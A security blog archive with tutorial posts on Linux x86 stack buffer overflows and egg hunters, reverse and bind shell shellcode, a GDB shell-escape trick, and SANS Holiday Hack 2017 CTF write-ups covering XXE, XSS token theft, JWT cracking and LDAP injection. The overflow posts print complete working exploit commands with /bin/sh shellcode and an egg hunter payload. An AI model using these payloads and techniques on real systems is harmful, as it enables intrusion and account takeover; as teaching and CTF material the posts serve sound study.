Sunday, 22 April 2018

Why do we need Egg Hunters ?

In this post I am going to show you few examples of buffer overflow and why we need egghunters in certain scenarios

For these examples I am going to turn of all security features and compile our code with few unsafe operation flags.
  • Set the system with ASLR disabled - echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
  • Allow stack smashing - Compile the program with -fno-stack-protector
  • Make stack executable - Compile the program with -z execstack 

Lets get started with some simple vulnerable code

Scenario 1

#include<stdio.h>
#include<string.h>
void main(int argc,char **argv){
        char buffer[500];
        strcpy(buffer,argv[1]);
        printf("%s",buffer);
}

dibyendu@ubuntu:~/Desktop/b0f$ gdb -q ./b0f.o
Reading symbols from /home/dibyendu/Desktop/b0f/b0f.o...(no debugging symbols found)...done.
(gdb) r $(python -c 'print "A"*100+"B"*200+"C"*300+"D"*400+"E"*500')
Starting program: /home/dibyendu/Desktop/b0f/b0f.o $(python -c 'print "A"*100+"B"*200+"C"*300+"D"*400+"E"*500')
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEE
Program received signal SIGSEGV, Segmentation fault.
0x43434343 in ?? ()
(gdb) 

Now if we see the memory contents of the stack , it is really nice because we are able to overwrite a lot of locations ( good for our shellcodes ).

0xbfffeb7c: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffeb8c: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffeb9c: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffebac: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffebbc: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffebcc: 0x41414141 0x42424242 0x42424242 0x42424242
0xbfffebdc: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffebec: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffebfc: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffec0c: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffec1c: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffec2c: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffec3c: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffec4c: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffec5c: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffec6c: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffec7c: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffec8c: 0x42424242 0x42424242 0x42424242 0x43434343
0xbfffec9c: 0x43434343 0x43434343 0x43434343 0x43434343
0xbfffecac: 0x43434343 0x43434343 0x43434343 0x43434343
0xbfffecbc: 0x43434343 0x43434343 0x43434343 0x43434343
0xbfffeccc: 0x43434343 0x43434343 0x43434343 0x43434343
0xbfffecdc: 0x43434343 0x43434343 0x43434343 0x43434343
0xbfffecec: 0x43434343 0x43434343 0x43434343 0x43434343
0xbfffecfc: 0x43434343 0x43434343 0x43434343 0x43434343
0xbfffed0c: 0x43434343 0x43434343 0x43434343 0x43434343
0xbfffed1c: 0x43434343 0x43434343 0x43434343 0x43434343
0xbfffed2c: 0x43434343 0x43434343 0x43434343 0x43434343
0xbfffed3c: 0x43434343 0x43434343 0x43434343 0x43434343
0xbfffed4c: 0x43434343 0x43434343 0x43434343 0x43434343
0xbfffed5c: 0x43434343 0x43434343 0x43434343 0x43434343
0xbfffed6c: 0x43434343 0x43434343 0x43434343 0x43434343
0xbfffed7c: 0x43434343 0x43434343 0x43434343 0x43434343
0xbfffed8c: 0x43434343 0x43434343 0x43434343 0x43434343
0xbfffed9c: 0x43434343 0x43434343 0x43434343 0x43434343
0xbfffedac: 0x43434343 0x43434343 0x43434343 0x43434343
0xbfffedbc: 0x43434343 0x43434343 0x44444444 0x44444444
0xbfffedcc: 0x44444444 0x44444444 0x44444444 0x44444444
0xbfffeddc: 0x44444444 0x44444444 0x44444444 0x44444444

As ASLR is disabled and the address space is not radomized we will pick up a location and place the shellcode over there and overwrite EIP with that location. Let us get the EIP offset first.

(gdb) r $(python -c 'print "A"*100+"B"*200+"C"*212+"D"*4+"E"*500')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/dibyendu/Desktop/b0f/b0f.o $(python -c 'print "A"*100+"B"*200+"C"*212+"D"*4+"E"*500')

Program received signal SIGSEGV, Segmentation fault.
0x44444444 in ?? ()

Okay so
EIP Offset = 212+100+200 = 512
Address in Stack where we will keep our shellcode =  0xbfffef38( found with debugging )

bin/sh shellcode length = 23 bytes
"\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80";

Final Exploit and the result

(gdb) r $(python -c 'print "\x90"*16+"\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"+"\x90"*(512-23-16)+"\x38\xef\xff\xbf"+"D"*16')
Starting program: /home/dibyendu/Desktop/b0f/b0f.o $(python -c 'print "\x90"*16+"\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"+"\x90"*(512-23-16)+"\x38\xef\xff\xbf"+"D"*16')
process 3549 is executing new program: /bin/dash
$ whoami
dibyendu

Scenario 2

Well that was pretty straightforward , now let us take the following code. Here we have lowered the buffer space to 100 character. Also note that we are using strncpy and not strcpy



#include<stdio.h>
#include<string.h>
void main(int argc,char **argv){
        char buffer[100];
        strncpy(buffer,argv[1],200);
        printf("%s",buffer);
}

We will run the same initial exploit from first example and we will also check the stack

(gdb)  r $(python -c 'print "A"*100+"B"*200+"C"*300+"D"*400+"E"*500')
Starting program: /home/dibyendu/Desktop/b0f/bof_limited_buffer.o $(python -c 'print "A"*100+"B"*200+"C"*300+"D"*400+"E"*500')

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()

We can see in the stack contents that we are only able to overwrite a limited memory due to the limited buffer space of 100 bytes and copy restriction upto 200 bytes

(gdb) x/100x $esp-200
0xbfffec88: 0xb7e61741 0xb7fc6ff4 0x00000000 0x00000000
0xbfffec98: 0xbfffed48 0xb7e6b8cf 0xb7fc7a20 0x08048530
0xbfffeca8: 0xbfffecc4 0xb7e6b8a0 0x08048530 0xb7fff918
0xbfffecb8: 0xb7fc6ff4 0x08048452 0x08048530 0xbfffecdc
0xbfffecc8: 0x000000c8 0xb7ff3f9c 0xbfffed84 0x00000000
0xbfffecd8: 0x00000000 0x41414141 0x41414141 0x41414141
0xbfffece8: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffecf8: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffed08: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffed18: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffed28: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffed38: 0x41414141 0x41414141 0x42424242 0x42424242
0xbfffed48: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffed58: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffed68: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffed78: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffed88: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffed98: 0x42424242 0x42424242 0x42424242 0xb7ff2660
0xbfffeda8: 0xb7e38449 0xb7ffeff4 0x00000002 0x08048360
0xbfffedb8: 0x00000000 0x08048381 0x08048414 0x00000002
0xbfffedc8: 0xbfffede4 0x08048460 0x080484d0 0xb7fed230
0xbfffedd8: 0xbfffeddc 0xb7fff918 0x00000002 0xbfffef53
0xbfffede8: 0xbfffef83 0x00000000 0xbffff560 0xbffff573
0xbfffedf8: 0xbffff59e 0xbffff5ae 0xbffff5b9 0xbffff60a

What is egg hunter ?
So as you can see that we have limited buffer in our application, and we are able to overwrite only a small content section in the stack , but actually in memory the arguments that was passed still reside.

(gdb) x/150x $esp+600
0xbfffefa8: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffefb8: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffefc8: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffefd8: 0x41414141 0x41414141 0x41414141 0x42414141
0xbfffefe8: 0x42424242 0x42424242 0x42424242 0x42424242
0xbfffeff8: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff008: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff018: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff028: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff038: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff048: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff058: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff068: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff078: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff088: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff098: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff0a8: 0x42424242 0x43424242 0x43434343 0x43434343
0xbffff0b8: 0x43434343 0x43434343 0x43434343 0x43434343
0xbffff0c8: 0x43434343 0x43434343 0x43434343 0x43434343
0xbffff0d8: 0x43434343 0x43434343 0x43434343 0x43434343
0xbffff0e8: 0x43434343 0x43434343 0x43434343 0x43434343
0xbffff0f8: 0x43434343 0x43434343 0x43434343 0x43434343
0xbffff108: 0x43434343 0x43434343 0x43434343 0x43434343
0xbffff118: 0x43434343 0x43434343 0x43434343 0x43434343
0xbffff128: 0x43434343 0x43434343 0x43434343 0x43434343
0xbffff138: 0x43434343 0x43434343 0x43434343 0x43434343
0xbffff148: 0x43434343 0x43434343 0x43434343 0x43434343
0xbffff158: 0x43434343 0x43434343 0x43434343 0x43434343
0xbffff168: 0x43434343 0x43434343 0x43434343 0x43434343
0xbffff178: 0x43434343 0x43434343 0x43434343 0x43434343
0xbffff188: 0x43434343 0x43434343 0x43434343 0x43434343
0xbffff198: 0x43434343 0x43434343 0x43434343 0x43434343
0xbffff1a8: 0x43434343 0x43434343 0x43434343 0x43434343
0xbffff1b8: 0x43434343 0x43434343 0x43434343 0x43434343
0xbffff1c8: 0x43434343 0x43434343 0x43434343 0x43434343
0xbffff1d8: 0x44434343 0x44444444 0x44444444 0x44444444
0xbffff1e8: 0x44444444 0x44444444 0x44444444 0x44444444
0xbffff1f8: 0x44444444 0x44444444

So the concept of egg hunter is , put a unique string in the memory also known as "tag" and we will search for the occurence of this tag and just next to the tag we will put the shellcode. So the egghunter payload ( which is smaller in size compared to the payload ) will search for the tag and once it finds the tag, its control will jump to that location and thus execute the payload in the process

Implementing an egg hunter ( with refernce to Scapes's document )




So in this case our EIP at 112
(gdb) r $(python -c 'print "A"*112+"B"*2+"C"*2+"D"*400+"E"*500')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/dibyendu/Desktop/b0f/bof_limited_buffer.o $(python -c 'print "A"*112+"B"*2+"C"*2+"D"*400+"E"*500')

Program received signal SIGSEGV, Segmentation fault.
0x43434242 in ?? ()

So our exploit payload will be something like this

[NOPS] [EGG HUNTER PAYLOAD] [NOPS] [RETURN ADDRESS ] [TAG][TAG][SHELLOCODE]

[NOPS] = "\x90"*24
[EGG HUNTER PAYLOAD] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xbb\x42\x41\x42\x41\x66\x81\xca\xff\x0f\x42\x60\x8d\x5a\x04\xb0\x21\xcd\x80\x3c\xf2\x61\x74\xed\x39\x1a\x75\xee\x39\x5a\x04\x75\xe9\xff\xe2"
[NOPS] = "\x90"*(112-43-24)
[RETURN ADDRESS ] = 0xbffff268
[TAG][TAG] = "\x42\x41\x42\x41\x42\x41\x42\x41"
[SHELLOCODE] = \x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80

Testing our proof of concept

(gdb) r $(python -c 'print "\x90"*24+"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xbb\x42\x41\x42\x41\x66\x81\xca\xff\x0f\x42\x60\x8d\x5a\x04\xb0\x21\xcd\x80\x3c\xf2\x61\x74\xed\x39\x1a\x75\xee\x39\x5a\x04\x75\xe9\xff\xe2"+"\x90"*(112-43-24)+"\x68\xf2\xff\xbf"+"\x42\x41\x42\x41\x42\x41\x42\x41"+"\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"')
Starting program: /home/dibyendu/Desktop/b0f/bof_limited_buffer.o $(python -c 'print "\x90"*24+"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xbb\x42\x41\x42\x41\x66\x81\xca\xff\x0f\x42\x60\x8d\x5a\x04\xb0\x21\xcd\x80\x3c\xf2\x61\x74\xed\x39\x1a\x75\xee\x39\x5a\x04\x75\xe9\xff\xe2"+"\x90"*(112-43-24)+"\x68\xf2\xff\xbf"+"\x42\x41\x42\x41\x42\x41\x42\x41"+"\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"')
process 3762 is executing new program: /bin/dash
$ whoami
dibyendu

Credits and References  : 

Florian Bogner ( https://www.linkedin.com/in/fbogner/)   [ for giving me some tips of the vulnerable code implementation ]

www.hick.org/code/skape/papers/win32-shellcode.pdf            [ for the egghunter explanation ]

https://osandamalith.com/2015/02/12/x86-linux-egg-hunter/   [ for the c wrapper of the egghunter shellcode ]

Saturday, 14 April 2018

Coding a custom TCP Reverse Shell Shellcode for Linux x86 with Assembly

A shell is a small program that takes input from the user and sends it back to operating system and vice versa. In this writeup I will show you how we can create a custom tcp bind shell shellcode. So how does TCP Reverse exploit shell work ?

In a TCP Reverse shell exploit shellcode is more effective than bind shell. It might happen the victim firewall may block the incoming connection. So instead of opening the port at the victim side we will open a port at the attacker side. We ask the victim machine to connect back to us on successfull execution of the shellcode. So we on attacker side will listen for an incoming connection and when the attacker connect to the listening port,  on the victim side it will open up a shell and transfer the control to the attacker. So the attacker now has a shell access to the victims machine and can run any commands.

So there are few points I need to make clear while I write this post
1. The code that I have written went through  lot of  debugging and modification and I am still modifying ( to minimize , to remove bad characters like  PUSH 0x0 can introduce bad characters so I replaced them with something that had the value NULL and then pushed them to on stack like PUSH ECX )

2. Some code which I have written might look STUPID (for example mov eax,edx  followed by mov edx,eax). I just wrote them to remember few things like ( X will always hold Y data before the operation ) and I am optimizing them still to remove them. As I will keep updating my code , I will continue to remove them)

3. I will try to keep the documentation and the details in the code itself , so that I can constantly modify them from the github instead of modifying them twice , i.e here and in the github again.

Part 1 : Writing a TCP Reverse Shell in C. Now why did we start wring with a C code?

Firstly while coding with C we will use some  function calls which we will re-implement them exactly the same in our Assembly Code
Secondly due to the availability of the documentation in linux. So we can look up any documentation of the function by issuing the "man" command e.g man socket



TCP Reverse Shell Written in NASM , but this has a drawback ( only connect to hardcoded 127.0.0.1 which we will fix in the next code below this code)

We made some changes from the above code so that it can connect to any IP address

Shellcode with configurable IP and Port


This blog post has been created for completing the requirements of SecurityTube Linux Assembly Expert Certification:
http://www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: PA-1191

Monday, 9 April 2018

Coding a custom TCP Bind Shell Shellcode for Linux x86 with Assembly

A shell is a small program that takes input from the user and sends it back to operating system and vice versa. In this writeup I will show you how we can create a custom tcp bind shell shellcode.

So how does TCP Bind exploit shell work ?
In a TCP Bind Shell Exploit Shellcode, the exploit listens for an incoming connection and when the attacker connect to the port on which the exploit runs , it will open up a shell and transfer the control to the attacker. So the attacker now has a shell access to the victims machine and can run any commands.

So there are few points I need to make clear while I write this post
1. The code that I have written went through  lot of  debugging and modification and I am still modifying ( to minimize , to remove bad characters like  PUSH 0x0 can introduce bad characters so I replaced them with something that had the value NULL and then pushed them to on stack like PUSH ECX )

2. Some code which I have written might look STUPID (for example mov eax,edx  followed by mov edx,eax). I just wrote them to remember few things like ( X will always hold Y data before the operation ) and I am optimizing them still to remove them. As I will keep updating my code , I will continue to remove them)

3. I will try to keep the documentation and the details in the code itself , so that I can constantly modify them from the github instead of modifying them twice , i.e here and in the github again.

Part 1 : Writing a TCP Bind Shell in C. Now why did we start wring with a C code?

Firstly while coding with C we will use some  function calls which we will re-implement them exactly the same in our Assembly Code
Secondly due to the availability of the documentation in linux. So we can look up any documentation of the function by issuing the "man" command e.g man socket



Part 2: Replicating the same TCP Bind Shell in NASM



Part 3: The Generated Opcodes



Part 4: Testing our shellcode. Here I wrote the code in such a way that the port number is reconfigurable to any port instead of the default 9000

This blog post has been created for completing the requirements of SecurityTube Linux Assembly Expert Certification:
http://www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: PA-1191

Monday, 19 February 2018

Privilege Escalation Tricks : Shell Escape and Executing Shell Commands Via GDB

Often during penetest or CTFs you might need to execute shell commands but due to limited privileges you cannot and certain time you need to escape restricted shells, . In such scenario certain techniques comes handy. Like

  • Using NMAP  
  • Using Vi Editor
  • Using Find Command

Yesterday while I was playing with GDB , I found a way by which we can achieve similar results.

Here you can see , I can invoke system commands from the gdb shell.



Further more you can get a nice shell as well 



Thanks for reading ! 

Sunday, 18 February 2018

ASM to ShellCode and Shellcode to ASM

As i have started a journey into vulnerability research and exploitation, i thought of sharing some topics which I found very confusing initially. So i will try to detail as much information as possible.

So we will begin by writing a simple helloworld assembly code. The code will do the following

  • Print HelloWorld
  • and Exit
Now you may wonder why do I have to write a code that exits ? If such is the case then you might probably have written good amount of code in high level language. The compilers of high level languages takes care of it i.e writing the extra code in the object file like the exit code. Internally every operations like read , write , exit and so on requires some low level calls to kernel. These calls are called SysCalls. So if you are programming using high level language like C and C++ , then you don't need to write codes to make the syscalls because due to the abstraction layer that hides the excessive code that is required to code. The compiler takes care to generate the object code which has essential exit code in it. To trigger these syscalls we need to use interrupt. Now these interrupt is maintained using an interrupt table. The diagram below shows the workflow of the syscalls and the interrupt



Now that i have given you a brief idea on why we need to write an exit code in asm, we will program a helloworld code



Now that I have a working , elf binary , my next target is to generate the shellcode from it.

I will use the objdump utility to view the disassembled contents of the binary along with the opcodes.


There is a nice one liner at ( http://www.commandlinefu.com/commands/view/6051/get-all-shellcode-on-binary-file-from-objdump ) which we can use to get the shellcode from the binary.

objdump -d ./PROGRAM|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

Using this technique, we can get a nice shell code from it which we dont need to extract manually from the disassembled code

Sweet! Now our 1st part of the tutorial is over , moving to the next , ShellCode to Assembly.

Now if I present you with the following shellcode, how will you get back to a working elf executable.
"\xb8\x04\x00\x00\x00\xbb\x01\x00\x00\x00\xb9\xa4\x90\x04\x08\xba\x10\x00\x00\x00\xcd\x80\xb8\x01\x00\x00\x00\xbb\x02\x00\x00\x00\xcd\x80"'

Lets copy the shellcode and save the contents inside a file. Please note we are going to save the shellcode as raw hex file and not as text. To do it we need help of perl

Syntax :   perl -e 'print "YOUR SHELL CODE"' > outputFile

perl -e 'print "\xb8\x04\x00\x00\x00\xbb\x01\x00\x00\x00\xb9\xa4\x90\x04\x08\xba\x10\x00\x00\x00\xcd\x80\xb8\x01\x00\x00\x00\xbb\x02\x00\x00\x00\xcd\x80"' > hexraw

Now we will use the ndisasm utility to get the disassembled code from the file. So what ndisasm is doing here is converting the hex opcodes into equivalent asm instructions.

Syntax :  ndisasm -b 32 hexraw



Now you can see , we almost have the same code that we wrote, except there is an hardcoded address 0x80490a4 at line 3 and hardcoded value at line 4. The problem is we got the disassembled code of the .text section and not the .data section. Let us fix the code by modifying the code a little.

Finally we are able to get back our ASM code and make it execute successfully



References:

https://en.wikipedia.org/wiki/System_call
https://www.youtube.com/watch?v=G4wA7Zm-DIU&feature=youtu.be
http://searchsecurity.techtarget.com/answer/What-is-the-relationship-between-shellcode-and-exploit-code

Tuesday, 16 January 2018

SANS HOLIDAY HACK 2017 : PART 5

If you have not read the 1st Part then read it here.

http://oxhat.blogspot.in/2018/01/sans-holiday-hack-2017-part-1.html

So this part is all about exploiting machines.Each challenge will lead us to a page of the Great Book that will answer our questions to who was the actual culprit behind hurling those massive snowballs.

6) The North Pole engineering team has introduced an Elf as a Service (EaaS) platform to optimize resource allocation for mission-critical Christmas engineering projects at http://eaas.northpolechristmastown.com. Visit the system and retrieve instructions for accessing The Great Book page from C:\greatbook.txt. Then retrieve The Great Book PDF file by following those directions. What is the title of The Great Book page?

We can find the about the IP of the internal host from the NMAP scan on the compromised machine from PART 2 of this series.

nmap -PS80 -v 10.142.0.1/24 --open



Let us connect to the Alabaster's system again using SSH followed by local port forwarding


We will modify our host file slightly to get the point to http://eaas.northpolechristmastown.com



Now we have done this, we can browse to the website



Going through the website we find 2 interesting thing.

1. One DisplayXML where all the Elves are listed out




2. One Builder form which allows us to upload and build the GUI from an XML file


Also there is a sample available on the website at http://eaas.northpolechristmastown.com/XMLFile/Elfdata.xml

This is something how it looks like



Now I tried performing XXE Attacks, but failed


One blog post from SANS came useful to me , which is provided in the HINTS that got unlocked on solving terminal challenges.

https://pen-testing.sans.org/blog/2017/12/08/entity-inception-exploiting-iis-net-with-xxe-vulnerabilities

So we create two files

1. One containing the malicious xml code which we will upload xxepoc.xml. We can create this POC by looking at the XML Structure from the available XML code above.



2. One containing the malicious code which we will host evil.dtd

Okay so after this I uploaded the XML document and then looked at the apache access.log


However I cannot find any contents from the greatbook.txt. I tried many combination.

After failing multiple times I decided to have a look if anyone has solved this challenge or not, and interestingly I found one

https://duo.com/blog/sans-holiday-hack-2017-writeup

After doing the comparison of both our POC code, I found only one thing different.


The author is encoding % sendit with &#x25; sendit in the evil.dtd

I don't know the reason behind it as the 2nd occurrence of % is not encoded. However for the sake of solving it I tried to modify it and execute the payload and looked at the access.log file.

And guess what?  It worked !!!


I need to find the reason why it has to be done in this way and if you know the reason do comment in the section with the answer.

So following the url from the access.log we can find the 6th Page of the book






SANS HOLIDAY HACK 2017 : PART 6

If you have not read the 1st Part then read it here.

http://oxhat.blogspot.in/2018/01/sans-holiday-hack-2017-part-1.html

So this part is all about exploiting machines.Each challenge will lead us to a page of the Great Book that will answer our questions to who was the actual culprit behind hurling those massive snowballs.

Challenge

8) Fetch the letter to Santa from the North Pole Elf Database at http://edb.northpolechristmastown.com. Who wrote the letter?

On doing an nmap scan on  internal network using the compromised Alabaster's system, we can find the edb server


We will connect to Alabaster's machine again and use SSH Port forwarding to port 80 to get access to the web application.


Also we will edit our hosts file to make sure we can point at edb.northpolechristmastown.com


Now we can access the application


Once we do this we can try logging with alabaster's credentials, but it doesn't work.

Looking at the intercepted requests , we see that there is a session value in the cookie. My target is to steal the session cookie of the victim and replace our session value with it.

There is a client side simulation of a victim and we need to do a phishing attack.

This is the password reset page



There is an XSS filter working , so we  need to write a XSS Filter Evasion Payload to steal the cookie


So our payload for the attack is

Now we will try to send the forged password request to the victim


On successful exploitation, we can find the cookie of the victim in our access.log

At this point I tried changing the session value with the stolen cookie value but it did not work.

The source code at the home page revealed about one more juicy information. It seems the victim is storing np-auth token in the localstorage and also it checks if it is there it sends for validation. If successful it logs into the application.

Let's modify the XSS payload to steal the np-auth token.

After successful exploitation, we find the np-auth token

Now decoding the JWT Token it reveals us some information we need to log in and also to rectify the auth to make it valid , for example the expiry date.


So let us first try cracking the np-auth token, for this we can use one jwt-cracker


The jwt-cracker reveals that the Secret used to encode JWT token is 3lv3s

Now that we have all the information we need to do the following things

1. Modify the expiry date
2. Create a new np-auth token using the secret key
3. Add the np-auth token to our local storage

We will write a small piece of code to do the 1st two task in one shot !


Executing the program gives us the jwt token for our np-auth



For the next one we will open developer console and add the javascript code to store the generated np-auth value in the localStorge


After this we refresh the page , and bingo ! We are in !


Through the proxy tool we find UI models is fetched over an XML call which is then populated in the UI of the page.

Few points to note here from the code

1. We can search "beyond" the available option of ELF and Reindeer
2. To perform operation of administrator, an administrator password will be required

Now from the debug code we can understand that there is an LDAP application running


I tried searching with a well known reindeer information , Rudolph and then using blind injection techniques tried to figure out the password fields from it , and we found there was one field called userPassword which revealed the password in hashed form



So our final target should be writing an LDAP injection query that would allow me to bypass the query and allow me to search any data whose 'ou' can be anything that is *. Also one more thing we can assume from the message box that whenever i am trying to access Santa Panel , i am getting a notification, "You must be Claus to enter the Panel"

So I am using the gn value as "Claus" and ou = * 

On doing this request with input claus*)(ou=*))(&(gn=  and  modifying the request little bit by adding the password field, I can dump all the users information with hashed passwords.
Response


Our next step is to get the original value of the hashed password of Claus which is  001cookielips001




Now if we try to login with santas email and password , it wont work. Guess why ? Because we are logged into alabaster account by setting an np-auth token, so we need to generate one more auth token with Santa's information

Once we generate a new token using the department as 'administrator' and 'ou' as * and set it, on refreshing the browser we get a prompt. We need to provide the plaintext password here which we obtained by decryption of the hashed password.


And finally we can retrieve the letter